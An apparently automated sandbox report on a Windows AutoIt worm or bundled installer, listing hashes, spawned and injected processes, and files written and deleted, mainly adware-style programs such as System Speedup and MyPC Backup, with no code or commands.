Worm.Win32.AutoItGen_aca8f3ca50
Trojan.Win32.Autoit.dju (Kaspersky), Installer.Win32.InnoSetup.FD, Trojan.Win32.Iconomon.FD, Worm.Win32.AutoIt.FD, mzpefinder_pcap_file.YR, WormAutoItGen.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: aca8f3ca50fb0d2f7b6d415b7e6b7ccd
SHA1: fe66c020b229505b2f7794a1b178fc6f068b7d4d
SHA256: dd046b718aca14406025e994e65d87e25736ce34cbe3125228bf4200d061ba30
SSDeep: 24576:nhloDX0XOf4SSy5kTN/Tt6Qq8BXsOhjVxE1Q6AE UGDAToRDN/Tt6Qq8BXsOhjVt:nhloJfz5WN/1q8CAxj7bF0iDN/1q8CA0
Size: 1498112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2014-08-05 11:30:43
Analyzed on: WindowsXP SP3 32-bit
Summary:
Worm. A program that is primarily replicating on networks or removable drives.
Payload
No specific payload has been found.
Process activity
The Worm creates the following process(es):
install.exe:1768
~ssqyvbc.exe:2532
ping.exe:664
vcredist_x86.exe:1516
systweakasp.exe:3000
schtasks.exe:3420
schtasks.exe:1376
schtasks.exe:452
schtasks.exe:1156
schtasks.exe:460
schtasks.exe:1736
schtasks.exe:416
schtasks.exe:1952
schtasks.exe:1248
schtasks.exe:188
schtasks.exe:1004
btdal_4.exe:3492
~nvpitzc.exe:1180
aspsetup.exe:3592
SystemSpeedup.exe:2964
MsiExec.exe:1180
~aclxxmg.exe:3608
taskkill.exe:3808
taskkill.exe:3864
taskkill.exe:3140
taskkill.exe:2096
taskkill.exe:3536
taskkill.exe:3296
taskkill.exe:3368
taskkill.exe:3576
taskkill.exe:3100
taskkill.exe:3436
taskkill.exe:3664
taskkill.exe:3764
taskkill.exe:3604
taskkill.exe:460
taskkill.exe:3708
taskkill.exe:3264
taskkill.exe:3408
taskkill.exe:3320
taskkill.exe:3464
taskkill.exe:416
taskkill.exe:2532
taskkill.exe:1660
BackgroundHost.exe:3236
win-app_update_3.exe:2120
myapp_update_1.exe:1508
regsvr32.exe:3276
regsvr32.exe:2748
regsvr32.exe:3296
regsvr32.exe:188
regsvr32.exe:3396
Deeal.exe:3072
ssupsetup_sbinstall3_sbinstall3.exe:2716
%original file name%.exe:1068
ssupsetup_sbinstall3_sbinstall3.tmp:2724
aspsetup.tmp:4036
rightbackupsetup.exe:3220
Reporter.exe:2608
Reporter.exe:3008
The Worm injects its code into the following process(es):
systweakasp.tmp:3164
rightbackupsetup.tmp:3308
OnlineBackup.exe:640
AdvancedSystemProtector.exe:640
MyPC Backup.exe:892
~ahwapkv.exe:1512
RightBackup.exe:644
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process systweakasp.tmp:3164 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE5D0.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Application Data\ASP\aspsetup.exe (2966308 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE5D0.tmp\_isetup\_iscrypt.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE5D0.tmp\isxdl.dll (673 bytes)
%Documents and Settings%\%current user%\Application Data\rightbackup\rightbackupsetup.exe (2531561 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\ASP\aspsetup.exe (0 bytes)
%Documents and Settings%\%current user%\Application Data\ASP (0 bytes)
The process install.exe:1768 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\dd_vcredistMSI44B8.txt (546741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dd_vcredistUI44B8.txt (115346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VWL52.tmp (392 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\VWL52.tmp (0 bytes)
The process ~ssqyvbc.exe:2532 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Reporter.exe (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ssupsetup_sbinstall3_sbinstall3.exe (141333 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr53.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Reporter.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ssupsetup_sbinstall3_sbinstall3.exe (0 bytes)
The process vcredist_x86.exe:1516 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\5cf940aa749fd37a36c73657ff\eula.1049.txt (387 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1040.txt (13 bytes)
C:\5cf940aa749fd37a36c73657ff\globdata.ini (1 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.3082.dll (1487 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1036.txt (224 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1041.txt (5 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1028.dll (693 bytes)
C:\5cf940aa749fd37a36c73657ff\vcredist.bmp (5 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1033.dll (1390 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1040.dll (1754 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1031.txt (15 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1036.dll (1925 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.2052.txt (405 bytes)
C:\5cf940aa749fd37a36c73657ff\vc_red.msi (3475 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1042.txt (5 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.3082.txt (12 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1031.dll (1585 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1028.txt (3 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.2052.dll (1368 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1033.txt (10 bytes)
C:\5cf940aa749fd37a36c73657ff (8 bytes)
C:\5cf940aa749fd37a36c73657ff\install.exe (8790 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1049.dll (1437 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1041.dll (983 bytes)
C:\5cf940aa749fd37a36c73657ff\install.ini (844 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1042.dll (1851 bytes)
C:\5cf940aa749fd37a36c73657ff\$shtdwn$.req (788 bytes)
C:\5cf940aa749fd37a36c73657ff\vc_red.cab (56236 bytes)
The Worm deletes the following file(s):
C:\5cf940aa749fd37a36c73657ff\install.res.1031.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1040.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1028.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff\globdata.ini (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.3082.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1036.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1041.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1028.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\vcredist.bmp (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1033.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1040.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1031.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1036.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.2052.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff\vc_red.msi (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1042.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.3082.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1049.txt (0 bytes)
C:\_174046_ (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.2052.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\eula.1033.txt (0 bytes)
C:\5cf940aa749fd37a36c73657ff (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.exe (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1049.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1041.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.ini (0 bytes)
C:\5cf940aa749fd37a36c73657ff\install.res.1042.dll (0 bytes)
C:\5cf940aa749fd37a36c73657ff\vc_red.cab (0 bytes)
The process systweakasp.exe:3000 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2U700.tmp\systweakasp.tmp (7386 bytes)
The process btdal_4.exe:3492 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut54.tmp (7617 bytes)
%Documents and Settings%\%current user%\Application Data\~hwobqxw.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut57.tmp (3545 bytes)
%Documents and Settings%\%current user%\Application Data\~aclxxmg.exe (85220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\service[1].exe (324153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_Temp_cccwmay.tmp\Deeal.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_Temp_cccwmay.tmp\uninstall_betadeeal.exe (2321 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut57.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut54.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\~hwobqxw.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_Temp_cccwmay.tmp\Deeal.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_Temp_cccwmay.tmp (0 bytes)
The process ~nvpitzc.exe:1180 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\systemTaskSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\time_range[1].txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemTaskSet[3].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemTaskSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\systemTaskSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemTaskSet[1].htm (10 bytes)
The process aspsetup.exe:3592 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-ETN50.tmp\aspsetup.tmp (7386 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-ETN50.tmp\aspsetup.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-ETN50.tmp (0 bytes)
The process SystemSpeedup.exe:2964 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\System Speedup\bl.txt (556 bytes)
%Documents and Settings%\%current user%\Application Data\System Speedup\eng_rcp.dat (4708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\installtracker[1].htm (556 bytes)
%WinDir%\Tasks\System Speedup_UPDATES.job (276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\installtracker[1].aspx (516 bytes)
%Documents and Settings%\%current user%\Application Data\System Speedup\log_08-13-2014.log (2516 bytes)
%WinDir%\Tasks\System Speedup_DEFAULT.job (268 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\installtracker[1].aspx (0 bytes)
The process rightbackupsetup.tmp:3308 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-FO8JE.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-FO8JE.tmp\isxdl.dll (673 bytes)
The process ~aclxxmg.exe:3608 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\conf[1].txt (126 bytes)
%Documents and Settings%\%current user%\Application Data\betadeeal\new_conf.ini (126 bytes)
The process win-app_update_3.exe:2120 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~ssqyvbc.exe (521574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemspeedupSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\getCaping[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ssupsetup_binstall3[1].exe (1987998 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\systemspeedupSet[1].htm (10 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~ssqyvbc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ssupsetup_binstall3[1].exe (0 bytes)
The process myapp_update_1.exe:1508 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aff.conf (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OnlineBackup.exe (440794 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse42.tmp\LogEx.dll (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\log.txt (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse42.tmp\NSISdl.dll (14 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse42.tmp\LogEx.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse42.tmp\NSISdl.dll (0 bytes)
The process OnlineBackup.exe:640 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\AccessControl.dll (8 bytes)
%Program Files%\MyPC Backup\UnRegisterExtensions.exe (15 bytes)
%Program Files%\MyPC Backup\Database\mpcb_file_cache.db (7 bytes)
%Program Files%\MyPC Backup\AWSSDK.dll (106386 bytes)
%Program Files%\MyPC Backup\Database\mpcb_sig_cache.db (6 bytes)
%Program Files%\MyPC Backup\Crypto32.dll (1856 bytes)
%Program Files%\MyPC Backup\syncicon.ico (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcredist_x86.exe (328506 bytes)
%Program Files%\MyPC Backup\diffstack.dll (1552 bytes)
%Program Files%\MyPC Backup\AlphaVSS.60.x86.dll (5520 bytes)
%Program Files%\MyPC Backup\Crypto64.dll (1856 bytes)
%Program Files%\MyPC Backup\AlphaVSS.Common.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsSCM.dll (5 bytes)
%Program Files%\MyPC Backup\Service Start.exe (14 bytes)
%Program Files%\MyPC Backup\x86\System.Data.SQLite.dll (30464 bytes)
%Program Files%\MyPC Backup\AlphaVSS.52.x64.dll (5520 bytes)
%Program Files%\MyPC Backup\BackupStack.exe (1552 bytes)
%Program Files%\MyPC Backup\RestartExplorer.exe (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\ns46.tmp (6 bytes)
%Program Files%\MyPC Backup\AlphaVSS.51.x86.dll (4992 bytes)
%Program Files%\MyPC Backup\RegisterExtensionDotNet20_x86.exe (784 bytes)
%Program Files%\MyPC Backup\es_ES.mo (1856 bytes)
%Program Files%\MyPC Backup\mypcbackup.ico (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsExec.dll (6 bytes)
%Program Files%\MyPC Backup\GetText.dll (12 bytes)
%Program Files%\MyPC Backup\Shared Stack.dll (90365 bytes)
%Program Files%\MyPC Backup\Database\mpcb_backup_conf.db (16 bytes)
%Program Files%\MyPC Backup\MPCBContextMenu.dll (219601 bytes)
%Program Files%\MyPC Backup\AlphaVSS.52.x86.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsRandom.dll (784 bytes)
%Program Files%\MyPC Backup\LinqBridge.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mpbtrk.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\DotNetChecker.dll (1552 bytes)
%Program Files%\MyPC Backup\tick.ico (12088 bytes)
%Program Files%\MyPC Backup\Signup Wizard.exe (33877 bytes)
%Program Files%\MyPC Backup\de_DE.mo (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj44.tmp (592073 bytes)
%Program Files%\MyPC Backup\AlphaVSS.60.x64.dll (6360 bytes)
%Program Files%\MyPC Backup\Updater.exe (31856 bytes)
%Program Files%\MyPC Backup\uninst.exe (1546 bytes)
%Program Files%\MyPC Backup\MyPC Backup.exe (99102 bytes)
%Program Files%\MyPC Backup\syncing.ico (12088 bytes)
%Program Files%\MyPC Backup\MPCBIconOverlays.dll (124204 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\MyPC Backup.lnk (748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\MyPC Backup\MyPC Backup.lnk (774 bytes)
%Program Files%\MyPC Backup\Database\mpcb_queues.db (13 bytes)
%Program Files%\MyPC Backup\LogicNP.EZShellExtensions.dll (8560 bytes)
%Program Files%\MyPC Backup\RegisterExtensionDotNet20_x64.exe (16 bytes)
%Program Files%\MyPC Backup\it_IT.mo (1856 bytes)
%Program Files%\MyPC Backup\pt_PT.mo (1856 bytes)
%Program Files%\MyPC Backup\MPCBClient.dll (39329 bytes)
%Program Files%\MyPC Backup\ObjectListView.dll (13584 bytes)
%Program Files%\MyPC Backup\fr_FR.mo (1856 bytes)
%Program Files%\MyPC Backup\Database\mpcb_settings.db (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\MyPC Backup.lnk (762 bytes)
%Program Files%\MyPC Backup\Configuration Updater.exe (784 bytes)
%Program Files%\MyPC Backup\x64\System.Data.SQLite.dll (33633 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\MyPC Backup\Uninstall.lnk (545 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\DotNetChecker.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\ns46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\ns47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso43.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsSCM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\nsRandom.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz45.tmp\NSISdl.dll (0 bytes)
The process Deeal.exe:3072 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Program Files%\Deeal\ScriptHost.dll (12721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\ie9install.bmp (2712 bytes)
%Program Files%\Deeal\jquery-1.9.1.min.js (2410 bytes)
%Program Files%\Deeal\updater.js (3 bytes)
%Program Files%\Deeal\AddonsFramework.dll (2049 bytes)
%Program Files%\Deeal\ButtonSite.dll (8982 bytes)
%Program Files%\Deeal\BackgroundHostPS.dll (707 bytes)
%Program Files%\Deeal\jquery-1.7.1.min.js (2480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\UAC.dll (13 bytes)
%Program Files%\Deeal\json2.min.js (3 bytes)
%Program Files%\Deeal\BackgroundHost.exe (15353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\help_page.ini (1539 bytes)
%Program Files%\Deeal\tool.js (856 bytes)
%Program Files%\Deeal\updaterWrapper.js (2 bytes)
%Program Files%\Deeal\config.xml (286 bytes)
%Program Files%\Deeal\background.html (932 bytes)
%Program Files%\Deeal\uninstall.exe (211 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsp55.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\ie9install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp\help_page.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse56.tmp (0 bytes)
The process ssupsetup_sbinstall3_sbinstall3.exe:2716 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-CNDS9.tmp\ssupsetup_sbinstall3_sbinstall3.tmp (7386 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-CNDS9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-CNDS9.tmp\ssupsetup_sbinstall3_sbinstall3.tmp (0 bytes)
The process AdvancedSystemProtector.exe:640 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Application Data\systweak\Advanced-System-Protector\Settings.db (7245 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (134 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Application Data\systweak\Advanced-System-Protector\Settings.db-journal (26516 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\systweak\Advanced-System-Protector\Settings.db-journal (0 bytes)
The process MyPC Backup.exe:892 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4E.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4D.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Program Files%\MyPC Backup\log\WAIT_HANDLES.log (540 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\782D7E2BFB036A849A99FFA65C652D39 (244 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4A.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\782D7E2BFB036A849A99FFA65C652D39 (535 bytes)
%Program Files%\MyPC Backup\Database\mpcb_settings.db (2410 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4C.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Program Files%\MyPC Backup\Database\mpcb_settings.db-journal (31542 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0E506CEBBC8B162CFB2D72DB4891DCAE (1 bytes)
%Documents and Settings%\%current user%\Desktop\Sync Folder.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4B.tmp (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0E506CEBBC8B162CFB2D72DB4891DCAE (224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab49.tmp (49 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4C.tmp (0 bytes)
%Program Files%\MyPC Backup\Database\mpcb_settings.db-journal (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab49.tmp (0 bytes)
The process %original file name%.exe:1068 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut40.tmp (5585 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\~tewtitg.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3F.tmp (5393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\winUSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\winUSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\winUSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\winUSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\winUSet[2].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scratch.bat (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\WIN-statsAdmin.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\winUSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\~qufjkpj.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\winUSet[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\WIN-statsSystem.exe (3073 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\~tewtitg.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\WinU\~qufjkpj.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3F.tmp (0 bytes)
The process ssupsetup_sbinstall3_sbinstall3.tmp:2724 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Program Files%\System Speedup\is-0H5C2.tmp (601 bytes)
%Program Files%\System Speedup\is-M23MK.tmp (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\System Speedup\System Speedup.lnk (761 bytes)
%Program Files%\System Speedup\is-SLC12.tmp (601 bytes)
%Program Files%\System Speedup\is-LD96U.tmp (3 bytes)
%Program Files%\System Speedup\is-PHI2Q.tmp (9605 bytes)
%Program Files%\System Speedup\is-K02N8.tmp (601 bytes)
